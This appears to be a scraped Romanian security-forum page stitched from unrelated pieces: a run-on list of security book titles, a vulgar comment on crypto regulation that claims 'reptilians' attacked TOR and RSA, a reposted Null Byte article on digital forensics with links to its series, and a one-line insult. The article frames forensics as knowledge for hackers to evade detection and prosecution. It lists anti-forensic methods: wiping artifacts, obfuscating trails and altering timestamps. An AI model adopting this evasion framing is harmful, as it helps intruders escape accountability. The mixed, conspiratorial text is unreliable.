Guide to the SSCP CBK, Second Edition Official (ISC)2® Guide to the CAP® CBK®, Second Edition Official (ISC)2® Guide to the CCFP CBK Official (ISC)2® Guide to the ISSAP® CBK Official (ISC)2® Guide to the ISSAP® CBK, Second Edition Official (ISC)2® Guide to the ISSEP® CBK®, Second Edition Official (ISC)2® Guide to the ISSMP® CBK® Optical Coding Theory with Prime Oracle Identity Management, Governance, Risk, and Compliance Architecture, Third Edition PCI Compliance, The Definitive Guide Pearls of Discrete Mathematics Physical Security and Safety, A Field Guide for the Practitioner Practical Cryptography, Algorithms and Implementations Using C++ Practical Hacking Techniques and Countermeasures Practical Risk Management for the CIO PRAGMATIC Security Metrics, Applying Metametrics to Information Security Privacy-Aware Knowledge Discovery, Novel Applications and New Techniques Profiling Hackers, The Science of Criminal Profiling as Applied to the World of Hacking Protocols for Secure Electronic Commerce, Second Edition Public Key Infrastructure, Building Trusted Applications and Web Services Quantum Communications and Cryptography RC4 Stream Cipher and Its Variants Responsive Security, Be Ready to Be Secure RSA and Public-Key Cryptography Secure and Resilient Software Development Secure and Resilient Software, Requirements, Test Cases, and Testing Methods Secure Computers and Networks, Analysis, Design, and Implementation Secure Data Provenance and Inference Control with Semantic Web Secure Internet Practices, Best Practices for Securing Systems in the Internet and e-Business Age Secure Java, For Web Application Development Secure Semantic Service-Oriented Systems Securing and Controlling Cisco Routers Securing Cloud and Mobility, A Practitioner's Guide Securing Converged IP Networks Securing E-Business Applications and Communications Securing Systems, Applied Security Architecture and Threat Models Securing Windows NT/2000, From Policies to Firewalls Security and Policy Driven Computing Security and Privacy in Smart Grids Security De-Engineering, Solving the Problems in Information Risk Management Security for Service Oriented Architectures Security for Wireless Sensor Networks using Identity-Based Cryptography Security in an IPv6 Environment Security in Distributed, Grid, Mobile, and Pervasive Computing Security in RFID and Sensor Networks Security Management, A Critical Thinking Approach Security of Mobile Communications Security Patch Management Security Software Development, Assessing and Managing Security Risks Security Strategy, From Requirements to Reality Security without Obscurity, A Guide to Confidentiality, Authentication, and Integrity Smart Grid Security, An End-to-End View of Security in the New Electrical Grid Software Deployment, Updating, and Patching Software Test Attacks to Break Mobile and Embedded Devices Standard for Auditing Computer Applications, Second Edition Statistical Methods in Computer Security Strategic Information Security Surviving Security, How to Integrate People, Process, and Technology Testing Code Security The ABCs of LDAP, How to Install, Run, and Administer LDAP Services The CISO Handbook, A PRACTICAL GUIDE TO SECURING YOUR COMPANY The Complete Book of Data Anonymization, From Planning to Implementation The Definitive Guide to Complying with the HIPAA/HITECH Privacy and Security Rules The Ethical Hack, A Framework for Business Value Penetration Testing The Hacker's Handbook, The Strategy Behind Breaking into and Defending Networks The Laws of Software Process, A New Model for the Production and Management of Software The Practical Guide to HIPAA Privacy and Security Compliance The Practical Guide to HIPAA Privacy and Security Compliance, Second Edition The Privacy Papers, Managing Technology, Consumer, Employee and Legislative Actions The Security Risk Assessment Handbook, A Complete Guide for Performing Security Risk Assessments The Security Risk Assessment Handbook, A Complete Guide for Performing Security Risk Assessments, Second Edition The State of the Art in Intrusion Prevention and Detection The Total CISSP Exam Prep Book, Practice Questions, Answers, and Test Taking Tips and Techniques Trade Secret Theft, Industrial Espionage, and the China Threat Unauthorized Access, The Crisis in Online Privacy and Security Understanding Surveillance Technologies, Spy Devices, Privacy, History & Applications, Second Edition Understanding Surveillance Technologies, Spy Devices, Their Origins & Applications UNIX Administration, A Comprehensive Sourcebook for Effective Systems & Network Management Using the Common Criteria for IT Security Evaluation Vein Pattern Recognition, A Privacy-Enhancing Biometric Verification of Computer Codes in Computational Science and Engineering Visual Cryptography and Secret Image Sharing Vulnerability Management Watermarking Systems Engineering, Enabling Digital Assets Security and Other Applications Web Security, A WhiteHat Perspective What Every Engineer Should Know About Cyber Security and Digital Forensics Windows Networking Tools, The Complete Guide to Management, Troubleshooting, and Security Wireless Crime and Forensic Investigation Wireless Multimedia Communication Systems, Design, Analysis, and Implementation Wireless Security

Ai si tu dreptate. Dar: 1. Romania suge pula "directivei UE". noi nu avem idei proprii. facem doar ce zic altii. 2. companii si banci mari din UE investesc in crypto-coins si in tehnologia lor.(cu 3 sapt in urma) 3. crypto-coins negoceaza pentru o implementare "legala" si curata. care ar permite un control moderat asupra tranzactiilor (ex: contractele eth.) 4. sua si china si reptilienii au incercat de n-mii de ori sa futa TOR si RSA si blockchain(aka BTC) si unix/linux-kernel. si nu prea au reusit mare cacat. 5. puterea sta in mainile unor putini programatori care dezvolta tehnologiile din blockchain si construiesc noi modele. Guvernatii de care zici tu nu au mare influenta pe dezvoltarea crypto-coin, mai mult pe disiparea catre public si asta s-a facut deja. (Orice exchange BTC-USD necesita buletin si date personale.) Edit: Hai sa nu o dam in Matrix cu supraveghere si parnaie. Tu zici ca oricine deschide un nod in reteaua BTC intra la parnaie? Nu mai e Stalin in viata, deci relax. Nu s-a facut asa ceva pentru TOR sau Torrent si nici kk de ACTA nu a fost aprobata.

So many readers in the Null Byte community have been asking me questions about evading detection and hacking undetected that I decided to start a new series on digital forensics. I applaud each of you for your concern, as the last thing I want to see is one of you getting caught and spending years locked up in a 8 x 8 concrete room with a violent and lascivious cellmate. You can never be too cautious in this field of endeavor. The best way to evade detection is to understand what the other side is doing and using. So, this series will focus on the tools and techniques that law enforcement and the security engineers are using to detect and prosecute hackers around the world. What Is Digital Forensics? Digital forensics is the field of determining who was responsible for a digital intrusion or other computer crime. It uses a wide-range of techniques to gain attribution to the perpetrator. It relies upon the fundamental concept that whenever a digital intrusion or crime is committed, the perpetrator inadvertently leaves a bit of themselves behind for the investigator to find. These "bits" could be entries in log files, changes to the registry, hacking software, malware, remnants of deleted files, etc. All of these can provide clues and evidence to determine their identity and lead to the capture and arrest of the hacker. As a hacker, the more you know and understand about digital forensics, the better you can evade the standard forensic techniques and even implement anti-forensic measures to throw off the investigator. The Digital Forensic Tools Just like in hacking, there are a number of software tools for doing digital forensics. For the hacker, becoming familiar with these tools and how they work is crucial to evading them. Most digital forensic investigators rely upon three major commercial digital forensic suites. Guidance Software's EnCase Forensic Access Data's Forensic Tool Kit (FTK) Prodiscover These three suites are comprised of multiple tools and reporting features and can be fairly expensive. While these suites are widely used by law enforcement, they use the same or similar techniques as the free open-source suites without the fancy interfaces. By using the open source and free suites, we can come to understand how such tools as EnCase work without the expense. EnCase is the most widely used tool by law enforcement, but not necessarily the most effective and sophisticated. These tools are designed for user-friendliness, efficiency, certification, good training, and reporting. There are a number of the free, open-source forensic suites, including the following three. The Sleuthkit Kit (TSK) Helix Knoppix We will look at each of these suites to better understand what digital forensic investigators can see and find about an intrusion and the perpetrator. The Forensic Tools Available in BackTrack In addition, there are a large number of individual tools that are available for digital forensics, some of which are available in our BackTrack and Kali distributions. Some of the better tools in BackTrack include the following, among many others. sleuthkit truecrypt hexedit autopsy iphoneanalyzer rifiuti2 ptk exiftool evtparse.pl fatback scalpel dc3dd driftnet timestomp What Can Digital Forensics Do? Digital forensics can do many things, all of which the aspiring hacker should be aware of. Below is a list of just some of the things. Recovering deleted files, including emails Determine what computer, device, and/or software created the malicious file, software, and/or attack Trail the source IP and/or MAC address of the attack Track the source of malware by its signature and components Determine the time, place, and device that took a picture Track the location of a cell phone enabled device (with or without GPS enabled) Determine the time a file was modified, accessed or created (MAC) Crack passwords on encrypted hard drives, files, or communication Determine which websites the perpetrator visited and what files he downloaded Determine what commands and software the suspect has utilized Extract critical information from volatile memory Determine who hacked the wireless network and who the unauthorized users are And that' just some of the things you can do with digital forensics! What Is Anti-Forensics? Anti-forensics are techniques that can be used to obfuscate information and evade the tools and techniques of the forensic investigator. Some of these techniques include the following. Hiding Data: Hiding data can include such things as encryption and stegonography. Artifact wiping: Every attack leaves a signature or artifact behind. Sometimes it's wise to attempt to wipe these artifacts from the victim machine so as to leave no tell-tale trail for the investigator. Trail Obfuscation: A decent forensic investigator can trail nearly any remote attack to a IP address and/or MAC address. Trail obfuscation is a technique that leads them to another source of the attack, rather than the actual attack. Change the timestamp: Change the file timestamp (modify, access, and change) to evade detection by forensic tools. Stay Tuned for More on Digital Forensics We will spend some of my future Null Byte tutorials looking at the most widely-used techniques in digital forensics, using both commercial and open-source tools, and then advance to anti-forensics, or ways to evade detection from these tools and the forensic investigator. So, to learn the techniques law enforcement and security engineers are using to track hackers, along with how to avoid and evade, keep coming back here! Sursa: https://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-for-aspiring-hacker-part-1-tools-techniques-0149732/ part x: https://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-for-aspiring-hacker-part-2-network-forensics-0149958/ https://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-for-aspiring-hacker-part-3-recovering-deleted-files-0149868/ https://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-for-aspiring-hacker-part-4-evading-detection-while-dosing-0150445/ https://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-for-aspiring-hacker-part-5-windows-registry-forensics-0160561/ https://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-for-aspiring-hacker-part-6-using-ida-pro-0161643/ https://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-for-aspiring-hacker-part-7-windows-sysinternals-0162080/ https://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-for-aspiring-hacker-part-8-more-windows-registry-forensics-0162609/ https://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-for-aspiring-hacker-part-9-finding-storage-device-artifacts-registry-0164221/ https://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-for-aspiring-hacker-part-10-identifying-signatures-port-scan-dos-attack-0164805/ https://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-for-aspiring-hacker-part-11-using-splunk-0167012/ https://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-for-aspiring-hacker-part-12-windows-prefetch-files-0167643/ https://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-for-aspiring-hacker-part-13-browser-forensics-0168280/ https://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-for-aspiring-hacker-part-14-live-memory-forensics-0168337/ https://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-for-aspiring-hacker-part-15-parsing-out-key-info-from-memory-0169435/ https://null-byte.wonderhowto.com/how-to/hack-like-pro-digital-forensics-for-aspiring-hacker-part-16-extracting-exif-data-from-image-files-0170128/

Te-ai gandit sa mergi la cersit? Se castiga mai bine.